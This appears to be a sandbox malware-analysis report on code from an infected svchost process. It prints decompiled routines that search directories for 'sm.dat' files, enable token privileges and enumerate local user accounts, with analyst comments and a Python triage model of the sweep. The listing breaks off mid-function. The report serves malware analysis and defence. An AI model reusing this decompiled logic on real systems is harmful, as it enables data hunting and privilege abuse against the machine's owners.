                                                                                                                                        • API ID: Info$AddressProc$HandleLocaleModuleSystem$AllocAllocateCheckCurrentFreeInitializeLocalMembershipNativeProcessTokenVersion
                                                                                                                                        • String ID: 1.00$GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                                                                        • API String ID: 3827863693-3117966753
                                                                                                                                        • Opcode ID: f1eeebdcece5386905d72581e2e131025df84167071f7fe4044e6e55e74db658
                                                                                                                                        • Instruction ID: 0a7a2abbfc3859f8002cc6b7e1ddce59b3b4d5538729bf6102fa864256d08afd
                                                                                                                                        • Opcode Fuzzy Hash: f1eeebdcece5386905d72581e2e131025df84167071f7fe4044e6e55e74db658
                                                                                                                                        • Instruction Fuzzy Hash: 2F717471A753289FEB20AB64DC89F9E77B8EF04640F0181A5A649A61C0DF709F84DF61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                         Control-flow Graph
                                                                                                                                         (control-flow graph rendering omitted; only the basic-block edge data and the Executed / Not Executed legend were present in the extracted text)
                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                        			E0BC01FD3(void* __edx, long _a4, char* _a8, char* _a12, intOrPtr _a16, char* _a20) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v288;
                                                                                                                                        				void* _v336;
                                                                                                                                        				struct _WIN32_FIND_DATAA _v344;
                                                                                                                                        				char* _v348;
                                                                                                                                        				signed int _v352;
                                                                                                                                        				CHAR* _v364;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t37;
                                                                                                                                        				void* _t42;
                                                                                                                                        				void* _t44;
                                                                                                                                        				CHAR* _t45;
                                                                                                                                        				void* _t50;
                                                                                                                                        				void* _t54;
                                                                                                                                        				int _t58;
                                                                                                                                        				char* _t60;
                                                                                                                                        				void* _t65;
                                                                                                                                        				char* _t66;
                                                                                                                                        				void* _t73;
                                                                                                                                        				CHAR* _t74;
                                                                                                                                        				void* _t85;
                                                                                                                                        				void* _t87;
                                                                                                                                        				char* _t91;
                                                                                                                                        				void* _t92;
                                                                                                                                        				signed int _t93;
                                                                                                                                        				signed int _t95;
                                                                                                                                        
                                                                                                                                        				_t85 = __edx;
                                                                                                                                        				_t95 = (_t93 & 0xfffffff8) - 0x15c;
                                                                                                                                        				_t37 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t37 ^ _t95;
                                                                                                                                        				_v352 = _v352 & 0x00000000;
                                                                                                                                        				_v344.dwFileAttributes = _a4;
                                                                                                                                        				_t91 = _a8;
                                                                                                                                        				_v344.ftCreationTime = _a12;
                                                                                                                                        				_v348 = _a20;
                                                                                                                                        				if(_t91 != 0 &&  *_t91 != 0) {
                                                                                                                                        					_t44 = E0BC08F95(_t91);
                                                                                                                                        					_push(_t91);
                                                                                                                                        					_t45 = "\\*.*";
                                                                                                                                        					if(_t44 != 0) {
                                                                                                                                        						_t45 = "*.*";
                                                                                                                                        					}
                                                                                                                                        					_v352 = E0BC08EE2(_t45);
                                                                                                                                        					E0BC08D5E( &(_v344.ftLastAccessTime),  &(_v344.ftLastAccessTime), 0, 0x140);
                                                                                                                                        					_t50 = FindFirstFileA(_v364,  &_v344); // executed
                                                                                                                                        					_v348 = _t50;
                                                                                                                                        					if(_t50 != 0xffffffff) {
                                                                                                                                        						_t74 = "\\";
                                                                                                                                        						do {
                                                                                                                                        							if((_v344.ftLastAccessTime.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                        								__eflags = _v344.ftCreationTime;
                                                                                                                                        								if(_v344.ftCreationTime == 0) {
                                                                                                                                        									L15:
                                                                                                                                        									_t54 = E0BC08F32(E0BC08EE2(_t74, _t91),  &_v288);
                                                                                                                                        									__eflags = _v348;
                                                                                                                                        									_push(_a16);
                                                                                                                                        									_t88 = _t54;
                                                                                                                                        									_push(_t54);
                                                                                                                                        									_push(_v344.dwFileAttributes);
                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                        										E0BC01F01(__eflags);
                                                                                                                                        									} else {
                                                                                                                                        										_v348();
                                                                                                                                        									}
                                                                                                                                        									_t95 = _t95 + 0xc;
                                                                                                                                        									goto L19;
                                                                                                                                        								} else {
                                                                                                                                        									_t60 = StrStrIA( &_v288, _v344.ftCreationTime); // executed
                                                                                                                                        									__eflags = _t60;
                                                                                                                                        									if(_t60 != 0) {
                                                                                                                                        										goto L15;
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								if(lstrcmpiA(".",  &_v288) != 0 && lstrcmpiA("..",  &_v288) != 0) {
                                                                                                                                        									_t65 = E0BC08F95(_t91);
                                                                                                                                        									_push(_t91);
                                                                                                                                        									if(_t65 != 0) {
                                                                                                                                        										_t66 = 0;
                                                                                                                                        										__eflags = 0;
                                                                                                                                        									} else {
                                                                                                                                        										_t66 = _t74;
                                                                                                                                        									}
                                                                                                                                        									_t88 = E0BC08F32(E0BC08EE2(_t66),  &_v288);
                                                                                                                                        									E0BC01FD3(_t85, _v344.dwFileAttributes, _t68, _v344.ftCreationTime, _a16, _v348); // executed
                                                                                                                                        									_t95 = _t95 + 0x1c;
                                                                                                                                        									L19:
                                                                                                                                        									E0BC08D3D(_t88);
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							_t58 = FindNextFileA(_v336,  &(_v344.ftLastAccessTime)); // executed
                                                                                                                                        						} while (_t58 != 0);
                                                                                                                                        						FindClose(_v336); // executed
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				_t42 = E0BC08D3D(_v352);
                                                                                                                                        				_pop(_t87);
                                                                                                                                        				_pop(_t92);
                                                                                                                                        				_pop(_t73);
                                                                                                                                        				return E0BC09FDC(_t42, _t73, _v8 ^ _t95, _t85, _t87, _t92);
                                                                                                                                        			}

                                                                                                                                        0x0bc01fd3
                                                                                                                                        0x0bc01fd9
                                                                                                                                        0x0bc01fdf
                                                                                                                                        0x0bc01fe6
                                                                                                                                        0x0bc01ff0
                                                                                                                                        0x0bc01ff5
                                                                                                                                        0x0bc01ffd
                                                                                                                                        0x0bc02000
                                                                                                                                        0x0bc02008
                                                                                                                                        0x0bc0200e
                                                                                                                                        0x0bc0201d
                                                                                                                                        0x0bc02024
                                                                                                                                        0x0bc02025
                                                                                                                                        0x0bc0202a
                                                                                                                                        0x0bc0202c
                                                                                                                                        0x0bc0202c
                                                                                                                                        0x0bc0203c
                                                                                                                                        0x0bc02047
                                                                                                                                        0x0bc02055
                                                                                                                                        0x0bc0205b
                                                                                                                                        0x0bc02062
                                                                                                                                        0x0bc02068
                                                                                                                                        0x0bc0206d
                                                                                                                                        0x0bc02072
                                                                                                                                        0x0bc020df
                                                                                                                                        0x0bc020e4
                                                                                                                                        0x0bc020f9
                                                                                                                                        0x0bc02108
                                                                                                                                        0x0bc0210d
                                                                                                                                        0x0bc02114
                                                                                                                                        0x0bc02117
                                                                                                                                        0x0bc02119
                                                                                                                                        0x0bc0211a
                                                                                                                                        0x0bc0211e
                                                                                                                                        0x0bc02126
                                                                                                                                        0x0bc02120
                                                                                                                                        0x0bc02120
                                                                                                                                        0x0bc02120
                                                                                                                                        0x0bc0212b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc020e6
                                                                                                                                        0x0bc020ef
                                                                                                                                        0x0bc020f5
                                                                                                                                        0x0bc020f7
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc020f7
                                                                                                                                        0x0bc02074
                                                                                                                                        0x0bc02088
                                                                                                                                        0x0bc020a2
                                                                                                                                        0x0bc020a7
                                                                                                                                        0x0bc020aa
                                                                                                                                        0x0bc020b0
                                                                                                                                        0x0bc020b0
                                                                                                                                        0x0bc020ac
                                                                                                                                        0x0bc020ac
                                                                                                                                        0x0bc020ac
                                                                                                                                        0x0bc020c7
                                                                                                                                        0x0bc020d5
                                                                                                                                        0x0bc020da
                                                                                                                                        0x0bc0212e
                                                                                                                                        0x0bc0212f
                                                                                                                                        0x0bc02134
                                                                                                                                        0x0bc02088
                                                                                                                                        0x0bc0213e
                                                                                                                                        0x0bc02144
                                                                                                                                        0x0bc02150
                                                                                                                                        0x0bc02150
                                                                                                                                        0x0bc02062
                                                                                                                                        0x0bc0215a
                                                                                                                                        0x0bc02167
                                                                                                                                        0x0bc02168
                                                                                                                                        0x0bc02169
                                                                                                                                        0x0bc02174

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • FindFirstFileA.KERNELBASE(00000140,?,?,00000000,00000140), ref: 0BC02055
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC02084
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC02098
                                                                                                                                        • StrStrIA.KERNELBASE(?,00000000), ref: 0BC020EF
                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0BC0213E
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 0BC02150
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNextlstrlen
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 1112430718-1692270452
                                                                                                                                        • Opcode ID: 67bd23621ae2e30052fe985893bba09b66ec199bb82c577828a6236e56deab4e
                                                                                                                                        • Instruction ID: 6f9fb320e64279f46f72f9f53bdaee50ace9c0ec0fde0a9c19af987d6cab001e
                                                                                                                                        • Opcode Fuzzy Hash: 67bd23621ae2e30052fe985893bba09b66ec199bb82c577828a6236e56deab4e
                                                                                                                                        • Instruction Fuzzy Hash: 764191711383059FD711AF68CC49A6BBBE9EF88354F044929FA94C61D0EF31DA44DBA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.07%

                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                         			// E0BC03D27: one-level directory sweep. For the directory string in __ebx it hands
                                                                                                                                         			// <dir>\sm.dat, then <dir>\<subdir>\sm.dat for every immediate subdirectory, to
                                                                                                                                         			// E0BC01F01 together with _a4 and the constant 0xbeef0000. It never calls itself,
                                                                                                                                         			// so deeper directories are not visited. Helper roles follow the subcall APIs listed
                                                                                                                                         			// below: E0BC08EE2(suffix, prefix) and E0BC08F32(a, b) build a new string with
                                                                                                                                         			// lstrcpyA/lstrcatA, E0BC08D3D releases it with LocalFree, and E0BC08D5E(&buf, &buf, 0, 0x140)
                                                                                                                                         			// apparently zeroes the WIN32_FIND_DATAA (0x140 == sizeof(WIN32_FIND_DATAA) == 320).
                                                                                                                                         			// _t34, _t52, _t68 and _t72 are undeclared register aliases left by the decompiler.
                                                                                                                                         			E0BC03D27(char* __ebx, void* __edx, intOrPtr _a4) {
                                                                                                                                         				signed int _v12;
                                                                                                                                         				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                         				void* _v340;
                                                                                                                                         				signed int _v344;
                                                                                                                                         				intOrPtr _v348;
                                                                                                                                         				intOrPtr _v352;
                                                                                                                                         				void* __edi;
                                                                                                                                         				void* __esi;
                                                                                                                                         				signed int _t28;
                                                                                                                                         				signed int _t38;
                                                                                                                                         				void* _t42;
                                                                                                                                         				int _t48;
                                                                                                                                         				char* _t56;
                                                                                                                                         				void* _t61;
                                                                                                                                         				signed int _t64;
                                                                                                                                         				void* _t65;
                                                                                                                                         				void* _t66;
                                                                                                                                         
                                                                                                                                         				_t61 = __edx;
                                                                                                                                         				_t56 = __ebx;
                                                                                                                                         				_t28 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                         				_v12 = _t28 ^ _t64; // MSVC /GS stack cookie (global cookie xor ebp), re-checked by E0BC09FDC on return
                                                                                                                                         				_v344 = _v344 & 0x00000000; // search pattern not built yet; LocalFree(NULL) in the epilogue is harmless
                                                                                                                                         				_v348 = _a4;
                                                                                                                                         				if(__ebx == 0) { // NULL directory pointer: nothing to do
                                                                                                                                         					L9:
                                                                                                                                         					// common epilogue: free the "\*.*" pattern, verify the stack cookie
                                                                                                                                         					return E0BC09FDC(E0BC08D3D(_v344), _t56, _v12 ^ _t64, _t61, _t62, 0xbeef0000);
                                                                                                                                         				}
                                                                                                                                         				_t68 =  *__ebx;
                                                                                                                                         				if( *__ebx == 0) { // empty directory string
                                                                                                                                         					goto L9;
                                                                                                                                         				}
                                                                                                                                         				_t62 = "\\sm.dat";
                                                                                                                                         				_v340 = E0BC08EE2("\\sm.dat", __ebx); // <dir>\sm.dat
                                                                                                                                         				E0BC01F01(_t68, _v348, _t34, 0xbeef0000); // executed; _t34 presumably holds the path just built
                                                                                                                                         				E0BC08D3D(_v340);
                                                                                                                                         				_t38 = E0BC08EE2("\\*.*", __ebx); // <dir>\*.*  (FindFirstFileA pattern)
                                                                                                                                         				_t66 = _t65 + 0x18;
                                                                                                                                         				_v344 = _t38;
                                                                                                                                         				E0BC08D5E( &_v336,  &_v336, 0, 0x140);
                                                                                                                                         				_t42 = FindFirstFileA(_v344,  &_v336); // executed
                                                                                                                                         				_v340 = _t42;
                                                                                                                                         				if(_t42 == 0xffffffff) { // INVALID_HANDLE_VALUE: directory absent or unreadable, only the top-level probe was made
                                                                                                                                         					goto L9;
                                                                                                                                         				} else {
                                                                                                                                         					goto L3;
                                                                                                                                         				}
                                                                                                                                         				do {
                                                                                                                                         					L3:
                                                                                                                                         					// 0x10 == FILE_ATTRIBUTE_DIRECTORY; plain files are ignored, "." and ".." skipped
                                                                                                                                         					if((_v336.dwFileAttributes & 0x00000010) != 0 && lstrcmpiA(".",  &(_v336.cFileName)) != 0) {
                                                                                                                                         						_t48 = lstrcmpiA("..",  &(_v336.cFileName));
                                                                                                                                         						_t72 = _t48;
                                                                                                                                         						if(_t48 != 0) {
                                                                                                                                         							// <dir>\<subdir>\sm.dat  (_t62 still points at "\\sm.dat")
                                                                                                                                         							_v352 = E0BC08F32(E0BC08F32(E0BC08EE2("\\", _t56),  &(_v336.cFileName)), _t62);
                                                                                                                                         							E0BC01F01(_t72, _v348, _t52, 0xbeef0000); // _t52 presumably the path just built
                                                                                                                                         							E0BC08D3D(_v352);
                                                                                                                                         							_t66 = _t66 + 0x24; // stack adjustment after the cdecl calls above
                                                                                                                                         						}
                                                                                                                                         					}
                                                                                                                                         				} while (FindNextFileA(_v340,  &_v336) != 0);
                                                                                                                                         				FindClose(_v340);
                                                                                                                                         				goto L9;
                                                                                                                                         			}

                                                                                                                                         Address column for the listing above (detached by extraction): 0x0bc03d27 .. 0x0bc03e8b, one entry per statement line; 0x00000000 marks lines with no mapped instruction.


                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        • FindFirstFileA.KERNELBASE(00000000,?,?,00000000,00000140), ref: 0BC03DC1
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC03DEB
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC03E01
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        • FindNextFileA.KERNEL32(?,00000010), ref: 0BC03E58
                                                                                                                                        • FindClose.KERNEL32(?), ref: 0BC03E6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$Filelstrcatlstrcmpilstrcpy$CloseFirstFreeLocalNext
                                                                                                                                        • String ID: \*.*$\sm.dat
                                                                                                                                        • API String ID: 549939916-826034721
                                                                                                                                        • Opcode ID: 75f24a8f05f328a6f0117f52438f7abd1f42c0a44663c673c88f5ee7956add2a
                                                                                                                                        • Instruction ID: 8ca248bf010daae5389a851f858f91de07f66b769d5e133f1244a2b03301aecc
                                                                                                                                        • Opcode Fuzzy Hash: 75f24a8f05f328a6f0117f52438f7abd1f42c0a44663c673c88f5ee7956add2a
                                                                                                                                        • Instruction Fuzzy Hash: 2B316F70930258AFDB21AF65CC49BEABBB9EF59301F0441E4A518E62D0DF30CB84DE64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

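The routine E0BC03D27 above is easy to misread as a recursive search. The following Python model is an added example, not code from the report or from the sample, and it exists so an analyst can see exactly which paths the sweep hands to E0BC01F01 for a given directory tree: the base directory's sm.dat first, then sm.dat in each immediate subdirectory, and nothing deeper. Assumptions, stated here and in the comments: the helper roles (E0BC08EE2/E0BC08F32 concatenate, E0BC01F01 consumes the path) are inferred from the subcall API lists in the report; the fixture tree is constructed; `candidate_paths`, `find_present` and `build_fixture` are names chosen for this example.

```python
"""Model of the one-level sweep in E0BC03D27 (added example, not the sample's code).

candidate_paths() returns the exact backslash-joined strings the sample builds,
find_present() is the host-triage view: which of those locations hold an sm.dat.
"""
import os
import tempfile
from typing import Callable, List, Optional

TARGET = "sm.dat"                  # the "\\sm.dat" literal in the listing
FILE_ATTRIBUTE_DIRECTORY = 0x10    # the bit tested on dwFileAttributes


def _locations(base_dir: str, join: Callable[..., str]) -> List[str]:
    """Visit the same locations as the listing: <base>\\sm.dat, then
    <base>\\<subdir>\\sm.dat for every immediate subdirectory.
    No recursion: E0BC03D27 never calls itself on a subdirectory."""
    out = [join(base_dir, TARGET)]                 # built before FindFirstFileA
    try:
        with os.scandir(base_dir) as it:           # FindFirstFileA(base + "\\*.*")
            for entry in it:
                # Win32 enumeration yields "." and "..", which the sample drops with
                # lstrcmpiA; scandir never yields them, the check is kept for symmetry.
                if entry.name in (".", ".."):
                    continue
                if entry.is_dir():                 # dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
                    out.append(join(base_dir, entry.name, TARGET))
    except OSError:
        # FindFirstFileA == INVALID_HANDLE_VALUE: the sample jumps to the epilogue
        # having made only the top-level probe.
        pass
    return out


def candidate_paths(base_dir: Optional[str]) -> List[str]:
    """Strings the sample would pass to E0BC01F01 (assumed to be the consumer),
    or [] for the two early-outs (NULL pointer, empty string)."""
    if not base_dir:
        return []
    return _locations(base_dir, lambda *parts: "\\".join(parts))


def find_present(base_dir: Optional[str]) -> List[str]:
    """Which of the swept locations actually contain an sm.dat on this host.
    Uses os.path.join so the check runs on any platform."""
    if not base_dir:
        return []
    return [p for p in _locations(base_dir, os.path.join) if os.path.isfile(p)]


def build_fixture() -> str:
    """Constructed sample tree: sm.dat at the top and in subdir 'a', an empty
    subdir 'b', a nested 'a/deep/sm.dat' that the sweep must NOT reach, and a
    plain file that must be ignored."""
    base = tempfile.mkdtemp(prefix="smdat_")
    os.makedirs(os.path.join(base, "a", "deep"))
    os.mkdir(os.path.join(base, "b"))
    for rel in (("sm.dat",), ("a", "sm.dat"), ("a", "deep", "sm.dat"), ("notes.txt",)):
        with open(os.path.join(base, *rel), "w") as f:
            f.write("constructed fixture\n")
    return base


if __name__ == "__main__":
    base = build_fixture()
    for p in candidate_paths(base):
        print("sample would probe:", p)
    for p in find_present(base):
        print("present on host:   ", p)
```

Running it against a real profile directory with `find_present` is the quickest way to confirm whether an infected host had anything for this routine to pick up; note that the sweep follows the directory attribute, so junctions and directory symlinks are visited like ordinary subdirectories.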
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                         			// E0BC09B51: enable the privilege named by _a4 in the current process token
                                                                                                                                         			// (LookupPrivilegeValueA -> OpenProcessToken(TOKEN_ADJUST_PRIVILEGES) -> AdjustTokenPrivileges).
                                                                                                                                         			// The return value is the raw AdjustTokenPrivileges result; see the caveat at _t36.
                                                                                                                                         			E0BC09B51(CHAR* _a4) {
                                                                                                                                         				signed int _v12;
                                                                                                                                         				intOrPtr _v16;
                                                                                                                                         				intOrPtr _v20;
                                                                                                                                         				struct _TOKEN_PRIVILEGES _v28;
                                                                                                                                         				void* _v32;
                                                                                                                                         				struct _LUID _v40;
                                                                                                                                         				void* __edi;
                                                                                                                                         				void* __esi;
                                                                                                                                         				signed int _t17;
                                                                                                                                         				int _t30;
                                                                                                                                         				intOrPtr _t31;
                                                                                                                                         				intOrPtr _t35;
                                                                                                                                         				int _t36;
                                                                                                                                         				signed int _t38;
                                                                                                                                         
                                                                                                                                         				_t17 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                         				_v12 = _t17 ^ _t38; // MSVC /GS stack cookie, verified by E0BC09FDC on return
                                                                                                                                         				_t36 = 0;
                                                                                                                                         				_v32 = 0;
                                                                                                                                         				// 0x20 == TOKEN_ADJUST_PRIVILEGES
                                                                                                                                         				if(LookupPrivilegeValueA(0, _a4,  &_v40) != 0 && OpenProcessToken(GetCurrentProcess(), 0x20,  &_v32) != 0) {
                                                                                                                                         					// The four stores below fill one TOKEN_PRIVILEGES through its flat stack slots:
                                                                                                                                         					// PrivilegeCount = 1, Privileges[0].Luid = _v40, Privileges[0].Attributes = SE_PRIVILEGE_ENABLED (2)
                                                                                                                                         					_v28.Privileges = _v40.LowPart;
                                                                                                                                         					_v20 = _v40.HighPart;
                                                                                                                                         					_v28.PrivilegeCount = 1;
                                                                                                                                         					_v16 = 2;
                                                                                                                                         					_t30 = AdjustTokenPrivileges(_v32, 0,  &_v28, 0x10, 0, 0); // executed; 0x10 == sizeof(TOKEN_PRIVILEGES), no previous-state buffer
                                                                                                                                         					// Caveat: AdjustTokenPrivileges returns nonzero even when the privilege is not held by the
                                                                                                                                         					// token; that case is only signalled by GetLastError() == ERROR_NOT_ALL_ASSIGNED (1300),
                                                                                                                                         					// which the sample never checks, so its callers may assume a privilege they do not have.
                                                                                                                                         					_t36 = _t30;
                                                                                                                                         				}
                                                                                                                                         				if(_v32 != 0) {
                                                                                                                                         					CloseHandle(_v32);
                                                                                                                                         				}
                                                                                                                                         				return E0BC09FDC(_t36, _t31, _v12 ^ _t38, _t35, _t36, 0);
                                                                                                                                         			}

                                                                                                                                         Address column for the listing above (detached by extraction): 0x0bc09b57 .. 0x0bc09bdf, one entry per statement line.


                                                                                                                                        APIs
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0BC09B73
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B83
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B8A
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 0BC09BBA
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09BCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3038321057-0
                                                                                                                                        • Opcode ID: ae6c67f298a57c9c8fd80d6876ff2d1e894e9b81ca9db163a35b5eabfc4901d4
                                                                                                                                        • Instruction ID: 4718ecaabd63b3458028bb7e9f7b3d10ac30c2a42dd234ed6d45263332c31b1d
                                                                                                                                        • Opcode Fuzzy Hash: ae6c67f298a57c9c8fd80d6876ff2d1e894e9b81ca9db163a35b5eabfc4901d4
                                                                                                                                        • Instruction Fuzzy Hash: AF111871E11219AFDB10DFA9D848BEFBBF8EF08754F004519E915E2280DB74DA45CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                         C-Code - Quality: 100%
                                                                                                                                         			E0BC01507(void __ecx) {                                                  // 0x0bc01507: enumerates local user accounts and prepends one (name, profile) node per account to the list headed at 0xbc10d08
                                                                                                                                         				char* _v8;                                                           // NetUserEnum output buffer (array of USER_INFO_3)
                                                                                                                                         				short* _v12;                                                         // index of the entry currently being processed
                                                                                                                                         				int _v16;                                                            // entriesread
                                                                                                                                         				int _v20;                                                            // resume_handle
                                                                                                                                         				int _v24;                                                            // totalentries
                                                                                                                                         				int _v28;                                                            // last NET_API_STATUS returned by NetUserEnum
                                                                                                                                         				int _t28;
                                                                                                                                         				void* _t37;
                                                                                                                                         				intOrPtr _t38;
                                                                                                                                         				void _t39;
                                                                                                                                         				short* _t40;
                                                                                                                                         				intOrPtr _t41;
                                                                                                                                         				intOrPtr* _t42;
                                                                                                                                         				void* _t43;
                                                                                                                                         
                                                                                                                                         				_t39 = __ecx;                                                        // 0x0bc01507: context object passed in ECX
                                                                                                                                         				_t40 = 0;                                                            // 0x0bc01510: _t40 serves as the constant 0 / NULL from here on
                                                                                                                                         				_v8 = 0;                                                             // 0x0bc01512
                                                                                                                                         				_v24 = 0;                                                            // 0x0bc01515
                                                                                                                                         				_v20 = 0;                                                            // 0x0bc01518: resume handle starts at 0 (first page)
                                                                                                                                         				_v16 = 0;                                                            // 0x0bc0151b
                                                                                                                                         				do {                                                                 // 0x0bc0151e
                                                                                                                                         					_t28 = NetUserEnum(_t40, 3, 2,  &_v8, 0xffffffff,  &_v16,  &_v24,  &_v20); // executed   // 0x0bc01535: NetUserEnum(NULL, level 3, FILTER_NORMAL_ACCOUNT, &buf, MAX_PREFERRED_LENGTH, &entriesread, &totalentries, &resume_handle)
                                                                                                                                         					_v28 = _t28;                                                     // 0x0bc0153b
                                                                                                                                         					if(_t28 == _t40 || _t28 == 0xea) {                               // 0x0bc01540: NERR_Success or ERROR_MORE_DATA (234): a full or partial buffer was returned
                                                                                                                                         						_t42 = _v8;                                                  // 0x0bc01549
                                                                                                                                         						if(_t42 == _t40) {                                           // 0x0bc0154e: no buffer, nothing to free either
                                                                                                                                         							goto L11;
                                                                                                                                         						}
                                                                                                                                         						_v12 = _t40;                                                 // 0x0bc01550
                                                                                                                                         						if(_v16 <= _t40) {                                           // 0x0bc01556: zero entries read
                                                                                                                                         							goto L9;
                                                                                                                                         						}
                                                                                                                                         						while(_t42 != _t40) {                                        // 0x0bc01558
                                                                                                                                         							_t38 = E0BC09BE0(_t39,  *((intOrPtr*)(_t42 + 0x68)), 0xffffffff); // 0x0bc01567: +0x68 is usri3_profile in the x86 USER_INFO_3; E0BC09BE0 (body not shown on this page) appears to copy or convert a NUL-terminated wide string
                                                                                                                                         							_t41 = E0BC09BE0(_t39,  *_t42, 0xffffffff);              // 0x0bc01573: +0x00 is usri3_name
                                                                                                                                         							_t43 = _t43 + 0x10;                                      // 0x0bc01575: stack clean-up for the two calls above
                                                                                                                                         							if(_t41 != 0) {                                          // 0x0bc0157a: only entries whose name converted are kept
                                                                                                                                         								_t37 = LocalAlloc(0x40, 0x8c);                       // 0x0bc01583: LPTR (LMEM_FIXED | LMEM_ZEROINIT), one 0x8c-byte list node
                                                                                                                                         								_t39 =  *0xbc10d08; // 0x325a4b0                     // 0x0bc01589: current list head
                                                                                                                                         								 *((intOrPtr*)(_t37 + 8)) = _t38;                    // 0x0bc0158f: node+8 = profile
                                                                                                                                         								 *((intOrPtr*)(_t37 + 4)) = _t41;                    // 0x0bc01592: node+4 = name
                                                                                                                                         								 *_t37 = _t39;                                       // 0x0bc01595: node+0 = previous head
                                                                                                                                         								 *0xbc10d08 = _t37;                                  // 0x0bc01597: head = node (prepend)
                                                                                                                                         							}                                                        // 0x0bc01597
                                                                                                                                         							_t42 = _t42 + 0x74;                                      // 0x0bc0159c: next entry; sizeof(USER_INFO_3) is 0x74 on x86
                                                                                                                                         							_v12 =  &(_v12[0]);                                      // 0x0bc0159f: decompiler rendering of the entry-counter increment
                                                                                                                                         							_t40 = 0;                                                // 0x0bc015a5
                                                                                                                                         							if(_v12 < _v16) {                                        // 0x0bc015aa: more entries in this page
                                                                                                                                         								continue;
                                                                                                                                         							} else {
                                                                                                                                         								goto L9;
                                                                                                                                         							}
                                                                                                                                         						}                                                            // 0x0bc015aa
                                                                                                                                         						goto L9;
                                                                                                                                         					} else {                                                         // 0x0bc015ac
